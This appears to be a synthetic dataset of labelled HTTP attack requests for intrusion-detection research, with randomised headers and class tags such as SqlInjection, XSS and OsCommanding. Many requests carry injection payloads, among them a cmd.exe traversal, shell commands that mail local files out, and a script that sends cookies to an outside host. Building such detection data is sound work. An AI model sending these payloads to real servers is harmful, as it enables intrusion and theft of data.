UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 8.2 5.78.241.105:8678, 6.2 www.coranqsi.html, FTP/6.8 26.40.18.134
Transfer-Encoding: gzip
Upgrade: dfnil/4.2
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mdi=koer)(&(objectClass    =  ai*)&3laitstetndihfo=Ntuo&ufiaAqhe5g9=s4crab6aMttijnge&qrjscriptbgsound@acCq=iutsuhwemvvf&gz0e=29&raukG7uwc=douidsapi9hu

End - Id: 36945
Start - Id: 48993
class: XPathInjection
GET /vEDfTNci1K/j3vS_.-CpCho.php4?hn6=wIOv1YXYU&a9eo=51&3s6aig=oyn9e%27+++or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+++i+%2B++j+++%2B++++k++%2Bl++%2B++1%29%5D+%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+%272oIsC%27%3D+%27+an2mt%27+++++or&6POC6Kp2mocha=9&nwiecanrr4e856i=78328&ev=5648840&9ny8ttEoaydynd=6lbwmxsOefoaae8pP&hne=rBw HTTP/1.0
Host: 118.251.179.122:80
Connection: close
Accept: video/quicktime, application/postscript
Accept-Charset: windows-1253;q=0.8, windows-1252;q=0.4, windows-1251, windows-1258
Accept-Encoding: identity, identity;q=0.1, compress;q=0.2, gzip
Accept-Language: an6-cB
Cache-Control: no-store
Client-ip: 102.111.118.138
Cookie: dsi1yu20hi=848;Sie=rnd\tisystemlrrc
Cookie2: $Version="778"
Date: Thu, 18 Mar 04 13:53:56 CET
ETag: W/"c@KYsDDHEulcjRLzw"
Expect: 100-continue
From: rdd7Hew6@nxilnib.gov
If-Modified-Since: Sun, 05 Apr 09 07:06:19 UTC
If-Unmodified-Since: Fri, 14 Mar 08 22:01:14 UTC
If-Match: *
If-None-Match: "1MnP-BOkAvamJRNfNEi"
If-Range: *
Max-Forwards: 385
MIME-Version: 9.9
Pragma: e3pibbai='eod'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Digest uri=/mefO/Ntfnyx/hohsk/lqzwhtli.sh
Range: 23-,057-,45-
Referer: http://7mdlno.org/gicxysz/ialgeTfd/nnoe/edime4t.php3
TE: trailers,gzip,gzip
Trailer: From
User-Agent: a3odn6a/7.6.6
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6996x6974
Via: HTTP/8.6 www.nric.html
Transfer-Encoding: compress
Upgrade: ttdCe/0.8, oa8sie/8.1, wteoa/2.2, Lsat/9.3
Warning: 728 157.50.122.194 "mlteR2oivlsnuennt" "Wed, 05 Jan 05 24:55:15 GMT"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48993
Start - Id: 36790
class: OsCommanding
GET /a55itsuIvelnnagnt1/rnw_E/iWnDsG-JBR9/cXXzq.12RZCHb.s2/nuEn2thd.js?YQ7_2sock_streamcat=a1hLxk&5ehenAld=351&a6n9r3sria=nuJidr6gpWUk&ha=ohosa9naotthn&6safrM4t=mail++aeitat3no%40eeIfIfA2l.rAaoi.gov+++++%3C%3C++%2Ftmp%2Fwu.c+++++%3B&yoamrl=nleoi HTTP/1.1
Host: 220.8.124.48
Connection: keep-alive
Accept: audio/*;q=0.8, text/*;q=0.7
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: ra-tfl, ysoEwuio-e7nea;q=0.1, akm-8rxee3y7
Cache-Control: no-transform
Client-ip: 183.149.193.186
Cookie: tI=latit7sFdtejee;m7tt=569760;nr=3;Hbso0yfS9eie=ZXk4kweareta6aord;yheddrae3helT=onPabrfyCe2;onexA=:Eoul
Cookie2: $Version="396"
Date: Wed, 16 Feb 05 08:55:48 UTC
ETag: W/"WNaw5RqhVgLPmf0nz7aY"
Expect: sTisifr=eetHwwn;dEakA
From: hlu5mLe@yeep.ch
If-Modified-Since: Thu, 04 Mar 10 20:28:25 UTC
If-Unmodified-Since: Wed, 23 Dec 09 16:42:26 GMT
If-Match: *
If-None-Match: *
If-Range: "4k3HD7n.qUbdpFqx-f"
Max-Forwards: 1641
MIME-Version: 5.1
Pragma: reuo5gst='pl'
Proxy-Authorization: Digest nc=1aE81C6d
Authorization: Digest algorithm=MD5-sess
Range: 907-5,-807
Referer: http://www.9augmw.be/taDkcWe.jsp
TE: trailers,gzip;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 0.9; no-ot; rv:4.2.1) Gecko/65111939
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: gacaa; 0cem2J=oant2IE
Upgrade: wfs/7.4
Warning: 133 www.UaEc.shtml:24599 "tmgftooT" 
X-Forwarded-For: 140.59.115.43
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36790
Start - Id: 44080
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 57.254.52.182
Connection: close
Accept: video/mpeg, image/*
Accept-Charset: iso-8859-7;q=0.5, x-mac-roman, isiri-3342;q=0.9
Accept-Encoding: *
Accept-Language: etsHr-ici6rEb, vd-1, eu-pyk;q=0.8, bteno8r-hsay;q=0.9
Cache-Control: min-fresh=5
Client-ip: 118.75.169.199
Cookie: dI2osteaqagde=omavrtjUg;rtlae=pqB5fx2I.j4p;iYLznl@P5GnX=8126;fah7risrf4htp=0139
Cookie2: $Version="4"
Date: Sat, 19 Aug 06 18:24:21 GMT
ETag: W/".Z.c4.xeA3kSTWv"
Expect: uoxvsRh=n8Csh2i;tofne7
From: eyde@enOee.biz
If-Modified-Since: Fri, 16 Nov 07 05:28:22 CET
If-Unmodified-Since: Sat, 07 Feb 04 23:08:12 UTC
If-Match: "4izoy@O-uWLf6iB"
If-None-Match: "MDPo74HHIQKQy_hE7"
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 3282
MIME-Version: 3.4
Pragma: o8na='dama'
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: NTLM QXljZXllaGF5MmljY3BzbHE0MHN0dW50Tm9yaW55Y3R0RWV0d250R200
Range: 70-
Referer: http://2woo4id.com/wrdmd/pvlzNsa/7eju/edoetat.txt
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.1 (Windows; U; Win98 8.7; sd-fe; rv:4.0.9) Gecko/25236690
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: 6.7 www.3x5m.html, peh/8.6 www.ytrtsbGZ.js, HTTP/3.6 30.37.47.72
Transfer-Encoding: gzip
Upgrade: unHis2/9.7, sDw/8.7
Warning: 085 103.13.130.10 "4nt6qytseorniY" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44080
Start - Id: 49577
class: XPathInjection
GET /rMxnsl/oowunoEwLes9w/hdurtwtpn/3jZocGER3YdR88Z5qA/3@NVIVn/4sp4taetnte/o3iSapseg/vC6i4sxnL5rAwwre6e0.php3?SeskeinsnRn=t%29n7eeieoer%25ic3&f4ueeeeBeasa6Ts=nRr&9en1tinwnotnD=hRXFLdbLCV-q&xQ40=yl%2Fobn%2F6%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D8%5D++or++%27per8%27+++%3D++++%27 HTTP/1.1
Host: www.cix4Egia9.net
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: gb2312;q=0.7
Accept-Encoding: *
Accept-Language: etlt2E-f, Bmx-hao;q=0.5
Cache-Control: only-if-cached
Client-ip: 165.72.212.249
Cookie: 1afraiprntal=01695824;toTw0si=fat
Cookie2: $Version="6"
Date: Sun, 31 Oct 04 24:37:35 UTC
ETag: W/"BDMRBwNmUW7P.XXGn"
Expect: rrqenrnd
From: xAlQbr@oetAt.gov
If-Modified-Since: Sat, 04 Oct 08 11:16:37 GMT
If-Unmodified-Since: Tue, 07 Oct 08 21:09:44 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Jun 05 06:37:51 UTC
Max-Forwards: 1200
MIME-Version: 1.5
Pragma: ees7l='gf'
Proxy-Authorization: eeftuo sfagt=srres
Authorization: Basic VmEwcWE6bmFyQQ==
Range: -351866,-996363,00-
Referer: /a7uyhg3/hhanlle/ie0dme/r6rot7hs.png
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: 4emonso/3.5.9.1.3
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2073x766
Via: 9.0 59.254.79.224:3497, 6.2 www.atewfme.shtml:443
Transfer-Encoding: gzip
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 4750592519886658439
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49577
Start - Id: 42768
class: SqlInjection
PUT /netcatAMu/omYSlxb6jandnerie/7dncteniJ/veZU75Aqselect/3e/_yFunion@/dh3dzrfglhgbec3a/oGI6ZZrEq/c@OAkBitp4Qhq/g0TVKlQhYvyGkH/r0.css? HTTP/1.1
Content-Length: 303
Content-Language: 3asee,Psa,egbho
Content-Encoding: identity
Content-Location: http://s1h8WonT.net/3attr/etsinp/tl6osj.php3
Content-MD5: bjhkZUhEcm1ldGZzdGFzZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Feb 08 15:38:35 UTC
Last-Modified: Tue, 19 Jul 05 20:39:45 CET
Host: www.ywiero.gov:4
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic;q=0.7, iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=6278
Client-ip: 88.137.246.81
Cookie: Rkc_Z=qwer'   or    iC_v.Account='lftItArt@esee.com
Cookie2: $Version="32"
Date: Mon, 10 Oct 05 07:40:29 CET
ETag: "YaxLpnk6itmK_Yb"
Expect: 100-continue
From: anpaN@pbason.biz
If-Modified-Since: Sun, 23 Apr 06 14:03:49 UTC
If-Unmodified-Since: Thu, 07 Jan 10 04:11:22 CET
If-Match: "mES35K3NuDEJduD2DY"
If-None-Match: *
If-Range: Wed, 15 Aug 07 02:31:57 GMT
Max-Forwards: 5654
Pragma: pofi=ael
Proxy-Authorization: Basic cnRjdGlIZDoxbnV0
Authorization: NTLM M2Flb2ZlcHJoZXRnU2d5a29lZXQydW9taHRlbG5uYmU=
Range: -6,803-,601849-26
Referer: http://nzeh.gov/eaie0q/3yefm/ageie/tctpqp.zip
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 3.7; ja-sh; rv:0.7.5) Gecko/63699428
UA-Disp: 110,8354,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 648x107
Via: 8.1 175.201.127.15:61, 1.4 202.140.126.176
Transfer-Encoding: gzip
Upgrade: Hic/2.5, elet/9.7
Warning: 418 141.165.184.104 "0mnaebmiteR" "Sat, 15 Oct 05 03:22:41 UTC"
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

bjtQSI=anda6+ti7di6ieneiArhtpassAn&hceemrbne7a=i$t&ysOqm2=deletefcdNcmsq&qi2TWljI=3894345997&TtzH8=ia%uermdivdaid;0o5fhaving&ttufaheuneroCd=0&ieIg1aab7MemTpo=edtemznta;&delNni4tmg2=ya8olm&hooylrle=e85gSe%udivtoLinsertol&8ruee3S1umjkgn=n36npqVfIk&Nin=13&Ukhetie6ifl=ooi6nUsc&ni=2&eXWBK=P2bth0

End - Id: 42768
Start - Id: 35531
class: XPathInjection
POST /oBQohgATvFAq/tk1tC-.nsf? HTTP/1.0
Content-Length: 341
Content-Language: tecCMiao,u0,i
Content-Encoding: deflate
Content-Location: /a2co/ilntE/uc9ne/utsOo.mdb
Content-MD5: NXlkaHNsc0RscjJvY21ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Nov 04 17:50:28 GMT
Last-Modified: Mon, 14 Sep 09 13:16:10 UTC
Host: www.itrctejot.cz:80
Connection: close
Accept: video/*;q=0.5
Accept-Charset: macintosh;q=0.4
Accept-Encoding: deflate, deflate;q=0.1
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 106.66.65.58
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="891"
Date: Fri, 05 Dec 08 24:17:49 UTC
ETag: W/"XioESPEeFrnADNJ"
Expect: jeseiyqo=oozs
From: ddsory@ail3hIue.st
If-Modified-Since: Fri, 03 Jul 09 01:12:59 GMT
If-Unmodified-Since: Tue, 13 Jan 09 04:30:50 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Oct 05 02:28:36 UTC
Max-Forwards: 699
MIME-Version: 8.9
Pragma: ena='amtet'
Proxy-Authorization: Digest nonce
Authorization: Basic dnVhN3M6bnByMmE=
Range: 7-26018,971548-,-1
Referer: /eXoQsc/9tie/dinne/Ophw3N/fdAeyd.wav
TE: trailers
Trailer: If-None-Match
User-Agent: bhsztequaehdDatwd
UA-CPU: 68000
UA-Disp: 740,794,8
Via: 8.3 164.7.111.234
Transfer-Encoding: compress
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 074 www.hio17hmp.gif "oloAfT" 
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

deQe7toB=n&hkgi8=tRyvT&3q5V=897926&IYbBxKET.6=ui']     |     P   |  //user[  name/text() =    'i8d&oYoocneemceu3=329000&xuec5nisera=(uscopyommne4gehsusr[hs&CmehsLsasahgf=8&iv=006330&PQivSWb@CB=682984725&f7lm=k x&tor0iloaw3=@eo 1$ea1nFamatn&0dSmMaY=hua&reoitOR=twmplnmrhd|&esTn4Suhsk=iBo&mdiv6bTZdquH=4584628

End - Id: 35531
Start - Id: 49319
class: XPathInjection
GET /zmdPDu8hOxQU4s.mdb?yghbkblL8=7&d8ssan1=25++++or+++++W9nveq%2FedeuIj%2Fv%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D526%5D++or++05%3D&._nph-0MEmF=95&o4tncmyyt2fIro=chj6qwmrhta1htvau8 HTTP/1.0
Host: 23.113.145.142
Connection: iitone
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress
Accept-Language: norel-s;q=0.6, nFiNt-s;q=0.7, tmu-ftL, ttnne-tl4
Cache-Control: only-if-cached
Client-ip: 66.86.201.155
Cookie: 9xteIw=846177751;ieafesz8ye=u3uhome7%iHtodocumentL[oj3ms;acezehu=ciAgw@
Cookie2: $Version="4"
Date: Wed, 17 Nov 04 03:12:24 CET
ETag: "nQHcadU1EvgfeIQ"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Mon, 20 Oct 08 21:27:24 CET
If-Unmodified-Since: Sat, 15 Nov 08 07:42:46 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 50
MIME-Version: 7.2
Pragma: ele='htro'
Proxy-Authorization: Digest nonce
Authorization: 6rts7i fsehur=hewya
Range: 28823-,87212-
Referer: /anteqc.sh
TE: trailers,gzip,gzip;q=0.5
Trailer: Accept
User-Agent: 3irs20fepd (ssW7QqmL; mWn26wE; 6gppT9j)
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: FTP/6.8 www.NeRfyr.png, 9.5 www.pelt.tiff
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 970 91.193.19.21 "6desenmdo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49319
Start - Id: 37590
class: LdapInjection
PUT /2ysausoy8feW/-Sf4@faconnectg52YHRy/snYt3/hdi/tRtztI0/gqROoP-_Irpq9/MyaoemgnSxrue5OT/l@BNz6z6BmOZ9/o@SJAAKEsMy0Z/hiw.css? HTTP/1.1
Content-Length: 252
Content-Language: gees6iE9,4Oiief,rsf0
Content-Encoding: identity
Content-Location: /m0au1awg.nsf
Content-MD5: YWJ5UWFob21va2ltd2owcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Sep 08 05:42:35 GMT
Last-Modified: Thu, 01 Sep 05 06:06:05 GMT
Host: www.6oqtneira.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lreeaTte-wa, tzj-rc;q=0.3
Cache-Control: max-age=7913
Client-ip: 229.175.84.16
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="870"
Date: Thu, 22 May 08 18:46:01 CET
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Fri, 31 Oct 08 18:30:09 GMT
If-Unmodified-Since: Sat, 29 Oct 05 24:35:27 GMT
If-Match: "5Mcg1qjzEnmAXH2zo"
If-None-Match: *
If-Range: Wed, 28 Jun 06 24:56:16 GMT
Max-Forwards: 3734
MIME-Version: 3.2
Pragma: traeah='0'
Proxy-Authorization: Digest qop=Sogaol
Authorization: NTLM aXRvYXBhbnVvbFdadnBhb29zaWVscnN0dGh1dHI1bW5hYW50bGVDZXd1YWU=
Range: 3-46,1783-444359
Referer: http://a5ld.cz/mee8f/Eloiie/ulb2/Nwk8nq.pl
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: Mozilla/7.0 (Machintosh; U; PPC 3.3; os-ew; rv:7.0.3) Gecko/50435001
UA-CPU: PowerPC
UA-Disp: 0007,792,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4454x553
Via: 9.2 www.ftyrig.png, 1.5 197.224.105.54, FTP/6.1 www.enixntoi.png
Transfer-Encoding: gzip
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9tazhR2at=6407&dearrxpbye=2&o1av=u4i7Rn.S&Uk1f_z= tlexaodiv&Gtk3f=ceSni)(&(objectClass=    hcvf*)&ynniytf=3646962&id1aottth=Ostd7ueshs9TN9&Y36yO=$b11Rar5dg%lerrLs&XdivUfdu=pphfa&thrteensFtva=4i&awm=276&elesizGdotma3mh=aremi2metanucE72et

End - Id: 37590
Start - Id: 43309
class: OsCommanding
GET /eYMcL-pBGal/tYU7SxWEBQKoOJ/nNvYsocH_6xb2yGV@Yo/uZn/ednIvhy/huacyLwr1diole4o/tIW/wcV.css?baoi=Ohg&pnneaxnOhh=%27+++++%3B+cat+++++%2Ftmp%2Fres+++mail+++lialarnd%40arnsle.com++++%3B HTTP/1.1
Host: 63.147.60.78
Connection: keep-alive
Accept: video/*;q=0.7
Accept-Charset: iso-8859-15, cp-936, utf-7, cp-950;q=0.5, iso-8859-7;q=0.9
Accept-Encoding: 
Accept-Language: sesnayt-twttnsg
Cache-Control: no-transform
Client-ip: 214.141.111.19
Cookie: rhirln01ermtu=tBz2U9g@4
Cookie2: $Version="66"
Date: Tue, 08 Apr 08 13:21:57 CET
ETag: W/"AZmcAcRfLdJ7fmTYUY"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Thu, 25 Jan 07 20:34:29 UTC
If-Unmodified-Since: Tue, 03 Jan 06 01:52:59 UTC
If-Match: "_Zgo5vd.6Mmc0oyyqU"
If-None-Match: "JFWi6FNoqeZXJvge0W"
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 567
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic bG5zcDp0b2lia3Nhbw==
Authorization: Basic Ump1QW10RTprZnl6bnc=
Range: 398265-
Referer: /olxk/Damkr.msf
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: nmFdcKE_Qq http://www.artedato.com
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: deflate
Upgrade: etcpl/3.4, Mhnlo/4.7, tml/8.3, ee6e2/3.3, sznIfp/8.1
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 221.241.126.53
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43309
Start - Id: 38136
class: LdapInjection
GET /ldUw_YvNKfi@8/aaCe/e.mf6xMm.shtml?h23ddehr=ln%27documenttonepii0&httpLRD_GKlsa_div=eitic%29%28++%7C%28iEwn%3D*%29&yyM7Q=aruefnstTijtd&DOtfprpaqv=971 HTTP/1.0
Host: www.undtet.biz
Connection: close
Accept: text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: afamo-lb;q=0.1, vws3h-npLcaemj;q=0.4, irqoN-to9eMnip, 9ehdnrn-f
Cache-Control: no-transform
Client-ip: 49.244.85.174
Cookie: mawooai=Rhn3 ei ;cT-Zw=ode0E9ehetcCA3e;Grt= 2odEyy;lohyonklhoN5ef=vyEPEPuuKcM;BdiceortUpol=ltr0Nanflia
Cookie2: $Version="3"
Date: Wed, 06 Sep 06 07:54:55 GMT
ETag: W/"E9eWP5kbo7V4.VA00kBy"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Sat, 18 Jul 09 04:14:53 GMT
If-Unmodified-Since: Thu, 12 Jan 06 16:27:20 GMT
If-Match: "CnOKubaYehQ48nND5sG"
If-None-Match: "pGoTWL51fL6vZ5cv1wV"
If-Range: "weOV50F1vup0rw5@6eHg"
Max-Forwards: 2937
MIME-Version: 1.0
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic c29vb3B0OkVlbGUwaFA=
Range: -49,90-,6-
Referer: http://www.e6eihfh.biz/kslihaye/e1c8myn/0Ens19me/iae2Des.asp
TE: trailers,deflate
Trailer: From
User-Agent: Mozilla/1.5 (Windows; U; WinNT 7.6; 5S-oh; rv:6.2.5) Gecko/88366771
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2471x139
Via: 6.3 www.Sejelz.htm:4
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 569 67.242.34.120 "kntzJdsesweleeIce" "Wed, 06 Sep 06 24:06:30 UTC"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38136
Start - Id: 47149
class: XSS
GET /i2bU_g-P6LFsK/c.ClLdpv0t3fTcj4EQ/yFVM/seev7eEtlRm8n/m9qFWEwwfBZKc6j_7Q/5pdets5/7xk6UhsO8D-sj/ecY95tB/u86siwahes/nu4l@CciX.gif?Jgmxfh6A=t7NVvY91V&he9ip=b+clkj0jpselectcdk&eie9thEme2glne=%3C%21--+--+--%3E%3Cscript%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.niolarsi.com%2Fcgi-bin%2Fdeilraon.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E%3C%21--+--+--%3E&8Snad6gdu4=bit HTTP/1.1
Host: www.srna.de
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: wMulEe-zctmo
Cache-Control: no-store
Client-ip: 181.228.8.193
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="5"
Date: Thu, 12 Jan 06 03:33:15 CET
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: tnrpsa=tPsspxH
From: Sdaen@9h0ezmcr.org
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Wed, 14 Jun 06 10:29:41 UTC
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: Fri, 23 May 08 02:14:43 UTC
Max-Forwards: 2
MIME-Version: 6.6
Pragma: tsa='Eirt'
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic bm9oOG94ZTpyZWF1
Range: 9848-585788,73810-,9-
Referer: /ehdDdeas/r3duuan/sXlw.gif
TE: trailers
Trailer: Date
User-Agent: wq4v6jNj7v http://www.Usvto.org
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: 4.8 140.128.117.70
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 54001451967
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47149
Start - Id: 37766
class: LdapInjection
GET /eqfF.p1HJXDGjmpouFGp/tawiqheshhjyhs/i2nndGTsejuxwnknhse/nhp/t5ch/e4LVdv/tvNF/5oahxkiEepd7/iTrjfu.KXhO4DJ-M/tnzaoo.mspx?haotlxhio=%29++%28++%7C++++%28+++cn%3D*o+%27brien*+%29%28mail++++%3D*o+++%27brien*%29+&onne=o%40oe-&eecwnTlb=42225&htpefemehnt=gOrD_.F4IQ&oE1in=sFLOEZekEIic&8LoYOaUq=ntri%26+&tidcstdysrt=2RcIcCoub&uatuyreg=sieemtespunioniw&7LiteWi=sDcFlU.O HTTP/1.0
Host: 118.213.247.254
Connection: twedteoi
Accept: */*
Accept-Charset: iso-8859-4;q=0.8, iso-8859-2;q=0.3, windows-1253;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 142.211.61.15
Cookie: eeaot=rapt-elo2qwp-hi i;Dform-JJ76ltmpK5=910239;V3n1=0l];TeRX9-TjWandC=hac;ibsmote=mQeA6L
Cookie2: $Version="37"
Date: Fri, 23 Feb 07 10:20:54 CET
ETag: "obHqz4OzX93Svrt6nEXA"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Wed, 16 Feb 05 09:51:41 UTC
If-Unmodified-Since: Mon, 03 Sep 07 19:14:47 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Sep 07 23:32:48 GMT
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 059-52057,02-0322
Referer: http://www.nwmeDr.net/ncter.nsf
TE: deflate,trailers
Trailer: From
User-Agent: Mozilla/7.9 (Machintosh; U; PPC 3.0; ya-30; rv:1.1.9) Gecko/93326222
UA-CPU: x86
UA-Disp: 3072,0786,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: FTP/2.5 253.194.176.145, medtr/3.5 115.210.243.25
Transfer-Encoding: identity
Upgrade: si0/4.3, ewgHho/5.9, yibiRd/8.8, ahmafn/5.3
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37766
Start - Id: 40255
class: SSI
PUT /zCNMhozP/lMe/n40eFnQ.shtml? HTTP/1.0
Content-Length: 420
Content-Language: ismVhi,sfwsioY,VEtl6
Content-Encoding: gzip
Content-Location: http://ivoto.org/voeoitw.jpeg
Content-MD5: WHRJdHR1N21laXN0ZW51bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 10:46:12 CET
Last-Modified: Tue, 12 Sep 06 05:55:56 UTC
Host: www.w4rbsuas.org
Connection: keep-alive
Accept: video/*, audio/x-wav, audio/*
Accept-Charset: *
Accept-Encoding: identity, compress, gzip
Accept-Language: 8sr-At1;q=0.3
Cache-Control: max-stale
Client-ip: 89.89.40.249
Cookie: cribrnhh=iuf(r;eoteededsneAn=O@](dSefv;hscbaurmiAxen=brb4itonmagee;insystemmhlog8xg=80896618;Owwwindow.openselect9ih=s1bTDO;ooEee4Qit=4305
Cookie2: $Version="7"
Date: Wed, 24 Oct 07 01:18:22 CET
ETag: "QQY_.zvrgninbUH8uvt"
Expect: 100-continue
From: YHtcdN@wRae.uk
If-Modified-Since: Sun, 09 Jan 05 07:11:17 GMT
If-Unmodified-Since: Thu, 26 Feb 09 01:56:14 CET
If-Match: *
